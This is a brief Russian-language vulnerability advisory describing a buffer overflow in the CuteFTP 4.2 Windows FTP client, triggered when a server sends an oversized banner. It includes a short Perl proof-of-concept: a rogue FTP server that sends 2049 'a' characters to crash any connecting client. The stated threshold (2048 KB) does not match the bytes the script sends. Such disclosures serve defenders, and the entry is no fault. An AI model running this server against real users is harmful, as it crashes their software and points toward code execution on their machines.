Дата публикации: | 05.01.2003 |
Всего просмотров: | 960 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | CuteFTP – популярный FTP клиент для Windows систем. В программе обнаружена возможность удаленного переполнения буфера, которая может использоваться злонамеренным FTP сервером для выполнения произвольного кода на системе клиента. Переполнение происходит при получении FTP баннера большого размера (более 2048 Кб). Пример FTP сервера, который убивает клиентский CuteFTP: #!/usr/bin/perl use IO::Socket; $port = "21"; $data = "a"; $num = "2049"; $buf .= $data x $num; $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2) or die "Couldn't create ftp-server: $_\n"; while ($client = $server->accept()) { print "Client connected.\n"; print "Attacking..."; print $client "$buf"; print "OK\n"; close($client); } #EOFУязвимость найдена в CuteFTP v.4.2 и возможно в более новых версиях Уязвимость обнаружена D4rkGr3y из Damage Hacking Group |
Ссылки: | CuteFTP v.4.2: buffer overflow :: |